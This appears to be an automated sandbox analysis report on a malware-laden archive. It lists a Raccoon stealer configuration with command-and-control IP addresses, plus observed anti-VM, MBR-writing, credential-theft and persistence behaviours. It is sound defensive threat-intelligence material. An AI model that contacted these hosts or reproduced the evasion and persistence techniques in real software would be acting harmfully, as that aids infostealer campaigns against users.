Resubmissions
30-01-2023 23:22
230130-3cv9radb76 1030-01-2023 23:21
230130-3b3x7sdb74 330-01-2023 23:17
230130-29z4jadb72 10Analysis
-
max time kernel
669s -
max time network
690s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
30-01-2023 23:22
Static task
static1
Behavioral task
behavioral1
Sample
PC_EXPERT-2023.rar
Resource
win10-20220812-en
General
-
Target
PC_EXPERT-2023.rar
-
Size
45.9MB
-
MD5
f093310a1184ce70410f1b5804a80e71
-
SHA1
6e65c4750890b85dde47dff3c30be157f695a540
-
SHA256
da7cf88afd6042e42b4f1fd2b8a4406a2760a0799ba6518e4e1b2d9d8ccd85ea
-
SHA512
bd36a977f01b07753c4a8af8731df839b291bfe792a0650edf626da57592d2afbc00e5b456758afe7f50e694bd10a5643e2344c9fdc829ca4b58179c8344cb2b
-
SSDEEP
786432:2esLswaZZTWu1X0NyoWQiNOlorjNNQufwgtUapmGrX64PM6VPB:p2sDBWucyOarjp44pm74EA
Malware Config
Extracted
C:\Program Files\WinRAR\Rar.txt
Extracted
C:\Program Files\WinRAR\WhatsNew.txt
https
http
http://weirdsgn.com
http://icondesignlab.com
https://rarlab.com/themes/WinRAR_Classic_48x36.theme.rar
Extracted
raccoon
8c3e4aa007fb2f2defacc1f952806f72
http://85.192.40.253/
http://170.75.160.9/
http://79.137.195.240/
Signatures
-
Modifies system executable filetype association 2 TTPs 8 IoCs
Processes:
uninstall.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} uninstall.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
Wondershare Filmora.exe4w6x1TqK.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Wondershare Filmora.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4w6x1TqK.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
AppLaunch.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts AppLaunch.exe -
Executes dropped EXE 34 IoCs
Processes:
winrar-x64-620.exeuninstall.exeWinRAR.exeFile-Set-Up_PC.exeFile-Set-Up_PC.exe4w6x1TqK.exe8ZmsaNu9.exeouicztmm.exedllhost.exefilmora_setup_full846.exesvcupdater.exeNFWCHK.exefilmora_64bit_full846.exefilmora_64bit_full846.tmp_setup64.tmpwinlogson.exeDFpAnk0w.exeWondershare Helper Compact.exeWondershare Helper Compact.tmpWSHelper.exevcredist_x64.exeinstall.exeWondershare NativePush.exeWondershare NativePush.tmp_setup64.tmpWsNativePushService.exeWsNativePushService.exeWsNativePushService.exeWsToastNotification.exedllhost.exewinlogson.exeWondershare Filmora Launcher.exeWondershare Filmora.exeAlgorithmRunTest.exepid process 3044 winrar-x64-620.exe 4456 uninstall.exe 3736 WinRAR.exe 2536 File-Set-Up_PC.exe 3844 File-Set-Up_PC.exe 1528 4w6x1TqK.exe 2020 8ZmsaNu9.exe 4728 ouicztmm.exe 3680 dllhost.exe 4684 filmora_setup_full846.exe 4868 svcupdater.exe 5228 NFWCHK.exe 4816 filmora_64bit_full846.exe 5912 filmora_64bit_full846.tmp 4544 _setup64.tmp 4236 winlogson.exe 3264 DFpAnk0w.exe 580 Wondershare Helper Compact.exe 3844 Wondershare Helper Compact.tmp 4560 WSHelper.exe 4156 vcredist_x64.exe 5528 install.exe 3620 Wondershare NativePush.exe 1928 Wondershare NativePush.tmp 4068 _setup64.tmp 2536 WsNativePushService.exe 3640 WsNativePushService.exe 5668 WsNativePushService.exe 3264 WsToastNotification.exe 1936 dllhost.exe 4376 winlogson.exe 5060 Wondershare Filmora Launcher.exe 5432 Wondershare Filmora.exe 1560 AlgorithmRunTest.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 5 IoCs
Processes:
uninstall.exeWsToastNotification.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" uninstall.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\CLSID\{14100442-9664-1407-2647-000000000000}\LocalServer32 WsToastNotification.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\CLSID\{14100442-9664-1407-2647-000000000000}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Wondershare\\Wondershare NativePush\\WsToastNotification.exe\" -ToastActivated" WsToastNotification.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Wondershare Filmora.exe4w6x1TqK.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Wondershare Filmora.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4w6x1TqK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4w6x1TqK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Wondershare Filmora.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
8ZmsaNu9.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Control Panel\International\Geo\Nation 8ZmsaNu9.exe -
Loads dropped DLL 64 IoCs
Processes:
File-Set-Up_PC.exefilmora_64bit_full846.tmpWondershare Helper Compact.tmpWSHelper.exeinstall.exeWsToastNotification.exeWondershare Filmora.exepid process 2536 File-Set-Up_PC.exe 2536 File-Set-Up_PC.exe 2536 File-Set-Up_PC.exe 5912 filmora_64bit_full846.tmp 5912 filmora_64bit_full846.tmp 5912 filmora_64bit_full846.tmp 5912 filmora_64bit_full846.tmp 3844 Wondershare Helper Compact.tmp 3844 Wondershare Helper Compact.tmp 3844 Wondershare Helper Compact.tmp 4560 WSHelper.exe 4560 WSHelper.exe 4560 WSHelper.exe 4560 WSHelper.exe 4560 WSHelper.exe 5528 install.exe 3264 WsToastNotification.exe 3264 WsToastNotification.exe 5912 filmora_64bit_full846.tmp 5912 filmora_64bit_full846.tmp 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Wondershare Helper Compact.tmpdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Wondershare Helper Compact.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Wondershare Helper Compact.exe = "C:\\Program Files (x86)\\Common Files\\Wondershare\\Wondershare Helper Compact\\WSHelper.exe" Wondershare Helper Compact.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
4w6x1TqK.exeWondershare Filmora.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4w6x1TqK.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wondershare Filmora.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Wondershare Filmora.exedescription ioc process File opened for modification \??\PhysicalDrive0 Wondershare Filmora.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
File-Set-Up_PC.exeFile-Set-Up_PC.exeouicztmm.exesvcupdater.exeDFpAnk0w.exeWondershare Filmora.exepid process 2536 File-Set-Up_PC.exe 2536 File-Set-Up_PC.exe 3844 File-Set-Up_PC.exe 3844 File-Set-Up_PC.exe 4728 ouicztmm.exe 4728 ouicztmm.exe 4868 svcupdater.exe 4868 svcupdater.exe 3264 DFpAnk0w.exe 3264 DFpAnk0w.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe 5432 Wondershare Filmora.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
4w6x1TqK.exedescription pid process target process PID 1528 set thread context of 764 1528 4w6x1TqK.exe AppLaunch.exe -
Drops file in Program Files directory 64 IoCs
Processes:
winrar-x64-620.exeWondershare Helper Compact.tmpOpenWith.exedescription ioc process File opened for modification C:\Program Files\WinRAR\ReadMe.txt winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\RarExtInstaller.exe winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\Default64.SFX winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\is-IDE4N.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Skin\Default\is-18GO7.tmp Wondershare Helper Compact.tmp File created C:\Program Files\WinRAR\Descript.ion winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\WinCon64.SFX winrar-x64-620.exe File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\is-4HMBD.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-R997E.tmp Wondershare Helper Compact.tmp File opened for modification C:\Program Files\WinRAR\RarExt32.dll winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\Default.SFX winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\WinCon.SFX winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\is-710JM.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-KRSF6.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-CQUSC.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-J4QA9.tmp Wondershare Helper Compact.tmp File opened for modification C:\Program Files\WinRAR\Rar.txt winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\UnRAR.exe winrar-x64-620.exe File created C:\Program Files\WinRAR\RarExt32.dll winrar-x64-620.exe File created C:\Program Files\WinRAR\RarExtPackage.msix winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-MUG7U.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-J9AON.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\images\is-JAICM.tmp Wondershare Helper Compact.tmp File opened for modification C:\Program Files\WinRAR\Descript.ion winrar-x64-620.exe File created C:\Program Files\WinRAR\Order.htm winrar-x64-620.exe File created C:\Program Files\WinRAR\Default.SFX winrar-x64-620.exe File created C:\Program Files\WinRAR\WinCon64.SFX winrar-x64-620.exe File created C:\Program Files\WinRAR\WinRAR.chm winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-3QNA5.tmp Wondershare Helper Compact.tmp File opened for modification C:\Program Files\UndoProtect.exe OpenWith.exe File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\is-CVHQ0.tmp Wondershare Helper Compact.tmp File created C:\Program Files\WinRAR\License.txt winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\Uninstall.exe winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-V1JCP.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\images\is-9M0DI.tmp Wondershare Helper Compact.tmp File created C:\Program Files\WinRAR\Rar.txt winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\RarExt.dll winrar-x64-620.exe File created C:\Program Files\WinRAR\Zip.SFX winrar-x64-620.exe File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\is-SQVNL.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Skin\Default\is-VIR3B.tmp Wondershare Helper Compact.tmp File opened for modification C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Wondershare Helper Compact.exe Wondershare Helper Compact.tmp File created C:\Program Files\WinRAR\RarExtInstaller.exe winrar-x64-620.exe File created C:\Program Files\WinRAR\UnRAR.exe winrar-x64-620.exe File created C:\Program Files\WinRAR\WinRAR.exe winrar-x64-620.exe File created C:\Program Files\WinRAR\RarExt.dll winrar-x64-620.exe File created C:\Program Files\WinRAR\Resources.pri winrar-x64-620.exe File created C:\Program Files\WinRAR\Default64.SFX winrar-x64-620.exe File created C:\Program Files\WinRAR\WinCon.SFX winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\Zip.SFX winrar-x64-620.exe File created C:\Program Files\WinRAR\RarFiles.lst winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Skin\Default\is-FK1FO.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Wondershare Helper Compact.exe Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\style\is-U7S7A.tmp Wondershare Helper Compact.tmp File created C:\Program Files\WinRAR\Rar.exe winrar-x64-620.exe File opened for modification C:\Program Files\WinRAR\WinRAR.exe winrar-x64-620.exe File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Pages\suit\images\is-GDVA1.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\Skin\Default\is-T5EFT.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\is-1UQ7C.tmp Wondershare Helper Compact.tmp File created C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe_temp Wondershare Helper Compact.tmp File created C:\Program Files\WinRAR\WhatsNew.txt winrar-x64-620.exe -
Drops file in Windows directory 64 IoCs
Processes:
MicrosoftEdgeCP.exetaskmgr.exemsiexec.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe File opened for modification C:\Windows\Installer\MSI308A.tmp msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.1\amd64_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_d7860533.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90deu.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90esn.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90jpn.dll msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354307.0 msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354245.0 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90chs.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.0\msvcr90.dll msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.0\amd64_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_069f922e.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90rus.dll msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354323.1 msiexec.exe File created \??\c:\Windows\Installer\e602d00.msi msiexec.exe File created C:\Windows\Installer\SourceHash{4B6C7001-C7D6-3710-913E-5BC23FCE91E6} msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.1\mfc90.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90cht.dll msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354323.0 msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354292.1 msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354323.0\9.0.30729.4148.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354323.1\9.0.30729.4148.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354339.0\9.0.30729.4148.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.0\amd64_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_069f922e.manifest msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.1\amd64_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_d7860533.manifest msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90enu.dll msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\1007C6B46D7C017319E3B52CF3EC196E\9.0.30729 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.0\msvcp90.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.1\amd64_Microsoft.VC90.OpenMP_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_22d6ba8a.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354323.1\9.0.30729.4148.policy msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.1\vcomp90.dll msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354339.0 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354245.0\atl90.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.1\mfcm90.dll msiexec.exe File created \??\c:\Windows\Installer\$PatchCache$\Managed\1007C6B46D7C017319E3B52CF3EC196E\9.0.30729\FL_msdia71_dll_2_60035_amd64_ln.3643236F_FC70_11D3_A536_0090278A1BB8 msiexec.exe File created \??\c:\Windows\Installer\e602d03.msi msiexec.exe File opened for modification \??\c:\Windows\Installer\e602d00.msi msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\amd64_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_480678f3.cat msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\1007C6B46D7C017319E3B52CF3EC196E msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354323.2\9.0.30729.4148.cat msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.2\9.0.30729.4148.policy msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354307.2 msiexec.exe File opened for modification \??\c:\Windows\Installer\ msiexec.exe File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\1007C6B46D7C017319E3B52CF3EC196E\9.0.30729\FL_msdia71_dll_2_60035_amd64_ln.3643236F_FC70_11D3_A536_0090278A1BB8 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90esp.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\amd64_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_480678f3.manifest msiexec.exe File opened for modification C:\Windows\WinSxS\InstallTemp\20230131003354307.1 msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.2\9.0.30729.4148.cat msiexec.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90ita.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90kor.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.0\msvcm90.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354323.0\9.0.30729.4148.policy msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354339.0\9.0.30729.4148.policy msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354307.0\mfc90fra.dll msiexec.exe File created C:\Windows\WinSxS\InstallTemp\20230131003354292.1\mfc90u.dll msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Wondershare Filmora.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Wondershare Filmora.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Wondershare Filmora.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1180 schtasks.exe 3204 schtasks.exe 1900 schtasks.exe 4232 schtasks.exe 1284 schtasks.exe 496 schtasks.exe 4468 schtasks.exe 1016 schtasks.exe 3028 schtasks.exe 3656 schtasks.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
chrome.exechrome.exechrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 39 IoCs
Processes:
